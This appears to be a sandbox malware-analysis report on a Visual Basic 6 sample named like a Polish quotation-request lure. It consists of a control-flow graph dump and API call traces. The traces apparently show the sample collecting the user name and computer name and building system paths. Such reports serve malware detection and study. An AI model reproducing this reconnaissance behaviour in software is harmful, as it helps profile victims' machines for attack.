10265 4144f4 10252->10265 10255 414545 __vbaI4Str 10253->10255 10254->9997 10257 413997 __vbaInStr 10254->10257 10258 4145b9 __vbaGenerateBoundsError 10255->10258 10255->10265 10256 41393f __vbaGenerateBoundsError 10256->10259 10257->9997 10261 4139bf __vbaInStr __vbaAryUnlock 10257->10261 10262 4145c5 __vbaI4Str 10258->10262 10259->10246 10259->10248 10259->10250 10259->10251 10259->10254 10259->10256 10260 41451f __vbaGenerateBoundsError 10260->10265 10261->10103 10262->9997 10264 4145f7 __vbaInStr 10262->10264 10263 41459f __vbaGenerateBoundsError 10263->10265 10264->9997 10266 41461f __vbaInStr __vbaAryUnlock 10264->10266 10265->10253 10265->10255 10265->10258 10265->10260 10265->10262 10265->10263 10266->10103 10425 40738c 10267->10425 10285 40bf67 10284->10285 10286 415efe 10284->10286 10296 416000 10285->10296 10287 415f15 10286->10287 10290 415f0f __vbaSetSystemError 10286->10290 10288 415f2d 10287->10288 10289 415f1d __vbaNew2 10287->10289 10291 415f43 __vbaHresultCheckObj 10288->10291 10292 415f52 10288->10292 10289->10288 10290->10287 10291->10292 10293 415f6a __vbaHresultCheckObj 10292->10293 10294 415f7c 10292->10294 10293->10294 10295 415f8d __vbaSetSystemError __vbaFreeObj 10294->10295 10295->10285 10297 40bf73 __vbaObjSet 10296->10297 10298 41603e 10296->10298 10297->9732 10299 416056 10298->10299 10300 416046 __vbaNew2 10298->10300 10301 41607b 10299->10301 10302 41606c __vbaHresultCheckObj 10299->10302 10300->10299 10303 416093 __vbaHresultCheckObj 10301->10303 10304 4160a5 10301->10304 10302->10301 10303->10304 10305 4160b6 __vbaSetSystemError __vbaFreeObj 10304->10305 10305->10297 10427 405d3c 10306->10427 10325 405d3c 10324->10325 10326 41a624 __vbaSetSystemError __vbaRecUniToAnsi 10325->10326 10429 405d84 10326->10429 10431 406a10 10344->10431 10381 406769 10380->10381 10383 406ffd 10382->10383 10385 407045 10384->10385 10385->10385 10387 406aa5 10386->10387 10402 406878 10394->10402 10396 415717 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 10397 415738 10396->10397 10397->9934 10397->9935 10399 406878 10398->10399 10400 4157c7 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 10399->10400 10401 4157e8 10400->10401 10401->9937 10401->9939 10403 406881 10402->10403 10412 4112a3 10404->10412 10405 411546 __vbaStrCopy 10408 4115a4 __vbaFreeStr 10405->10408 10406 4112af #631 __vbaStrMove #516 __vbaFreeStr __vbaFreeVar 10407 4115c9 __vbaErrorOverflow 10406->10407 10406->10412 10408->9960 10409 4113c8 #593 10409->10407 10409->10412 10410 4115c4 10410->10407 10411 411459 17 API calls 10411->10407 10411->10412 10412->10405 10412->10406 10412->10407 10412->10409 10412->10410 10412->10411 10414 415954 __vbaFreeStr 10413->10414 10414->9987 10416 415db3 10415->10416 10417 41247f __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10415->10417 10418 415dc3 6 API calls 10416->10418 10419 415eb9 __vbaErrorOverflow 10416->10419 10417->10025 10418->10417 10420 415e0a __vbaLenBstr 10418->10420 10420->10419 10421 415e22 10420->10421 10421->10419 10422 415e39 __vbaLenBstr 10421->10422 10422->10419 10423 415e4e 10422->10423 10423->10419 10424 415e52 #631 __vbaStrMove __vbaFreeVar 10423->10424 10424->10417 10426 407395 10425->10426 10428 405d45 10427->10428 10430 405d8d 10429->10430 10432 406a19 10431->10432 10435 403670 #100 10436 403625 __vbaRaiseEvent 10435->10436 10437 40369a 10435->10437 10436->10435

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041E9EE
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA1E
                                                                                                                                                                                                                                                      • #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA30
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA3B
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041EA4C
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA61
                                                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(00000000), ref: 0041EA6D
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA7B
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA84
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041EA99
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAA4
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041EAAD
                                                                                                                                                                                                                                                      • #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041EABD
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAC8
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAD1
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041EB05,?,?,?,00000000,Function_000032B6), ref: 0041EAFE
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EB19
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$FreeMove$Error$#525#537#616AnsiBstrChkstkNameOverflowUnicodeUser
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 281739284-0
                                                                                                                                                                                                                                                      • Opcode ID: 51ebf8c25856d226b4dcde5673b463cf0edb45b4d208a7711fc342866f12040b
                                                                                                                                                                                                                                                      • Instruction ID: 1a108948efa492097ea428c0624f2b892237f430c038d1a03950295591b49aee
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51ebf8c25856d226b4dcde5673b463cf0edb45b4d208a7711fc342866f12040b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D31CA75900249EFDB04EFA4DE4DBDEBBB8EB08715F108269E502B62A0DB745944CB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040A85E
                                                                                                                                                                                                                                                      • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,Function_000032B6), ref: 0040A8B6
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040A91C
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000068), ref: 0040A97C
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040A9A5
                                                                                                                                                                                                                                                      • __vbaEnd.MSVBVM60 ref: 0040A9BD
                                                                                                                                                                                                                                                      • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040A9DD
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AA43
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,0000007C), ref: 0040AA9E
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040AAB9
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406300,000001BC), ref: 0040AAFD
                                                                                                                                                                                                                                                      • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040AB2F
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 0040AB95
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040ABF2
                                                                                                                                                                                                                                                      • #618.MSVBVM60(?,00000001), ref: 0040AC10
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040AC1B
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00406544,00000000), ref: 0040AC27
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040AC45
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60(?,?,Function_000032B6), ref: 0040AC51
                                                                                                                                                                                                                                                      • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,Function_000032B6), ref: 0040AC80
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040ACE6
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040AD43
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040AD74
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040AD7D
                                                                                                                                                                                                                                                      • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,Function_000032B6), ref: 0040ADA2
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AE08
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040AE65
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406544,?), ref: 0040AE86
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040AE91
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040AE9A
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040AEA3
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040AEB8
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040AECC
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040AED9
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040AEE9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000025,?,?,?,?,?,Function_000032B6), ref: 0040AF05
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0040AF12
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0040AF1B
                                                                                                                                                                                                                                                      • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,Function_000032B6), ref: 0040AF3B
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AFA1
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000058), ref: 0040AFFE
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,?), ref: 0040B01E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B029
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B035
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B040
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B04E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B059
                                                                                                                                                                                                                                                      • #517.MSVBVM60(00000000), ref: 0040B060
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B06B
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B078
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B094
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0A0
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaSetSystemError.MSVBVM60(00000064,004031C0,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429CF6
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: #525.MSVBVM60(00000200,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D05
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D16
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D20
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: SHGetPathFromIDList.SHELL32(?,00000000), ref: 00429D30
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D3A
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D43
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: #537.MSVBVM60(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D50
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5B
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5F
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: #616.MSVBVM60(?,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D73
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D7E
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaStrCat.MSVBVM60(00406544,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D86
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D91
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D9D
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaFreeStr.MSVBVM60(00429DEF,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DE8
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000024,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0B9
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0C6
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0CF
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0F8
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B105
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B115
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B131
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B13C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B14A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B155
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B161
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B16C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B179
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B184
                                                                                                                                                                                                                                                      • #517.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B18B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B196
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B1A3
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B1BF
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040B1EB
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B1F8
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B208
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B223
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B22E
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B23C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B247
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B253
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B25E
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B26C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B277
                                                                                                                                                                                                                                                      • #517.MSVBVM60(00000000), ref: 0040B27E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B289
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B296
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B2B2
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B2CA
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B2DC
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040B2FC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040B303
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B30E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B31B
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040B333
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B34B
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B35D
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B368
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040B37D
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040B384
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B38F
                                                                                                                                                                                                                                                      • #517.MSVBVM60(00000000), ref: 0040B396
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B3A1
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B3AE
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B3CA
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B3E2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040B3F6
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B403
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,00000000), ref: 0040B43C
                                                                                                                                                                                                                                                      • #669.MSVBVM60 ref: 0040B449
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B454
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B461
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040B46A
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B483
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00406F10,?), ref: 0040B49C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B4BD
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B4E9
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B502
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B50D
                                                                                                                                                                                                                                                      • __vbaEnd.MSVBVM60(0042C0D4), ref: 0040B54C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040BA5E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BA6B
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BA7B
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BA93
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040BAA7
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BAB4
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BAC4
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BADC
                                                                                                                                                                                                                                                        • Part of subcall function 00429CA0: __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(0000001C), ref: 0040BAEE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BB03
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040BB0A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040BB15
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BB22
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BB3A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000026), ref: 0040BB56
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BB63
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040BB6C
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BB81
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040BB93
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040BB9E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BBB3
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040BBBA
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040BBC5
                                                                                                                                                                                                                                                      • #517.MSVBVM60(00000000), ref: 0040BBCC
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040BBD7
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BBE4
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040BC00
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BC18
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(0000001A), ref: 0040BC2A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BC3F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040BC46
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040BC51
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BC5E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BC76
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,0040BC8B), ref: 0041E89E
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8CE
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8E0
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E8EB
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041E8FC
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041E911
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: GetComputerNameA.KERNEL32(00000000), ref: 0041E91D
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041E92B
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E934
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041E949
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E954
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041E95D
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041E96D
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E978
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E981
                                                                                                                                                                                                                                                        • Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(0041E9B5,?,?,?,00000000,Function_000032B6), ref: 0041E9AE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040BC90
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BC9D
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040BCA6
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041E9EE
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA1E
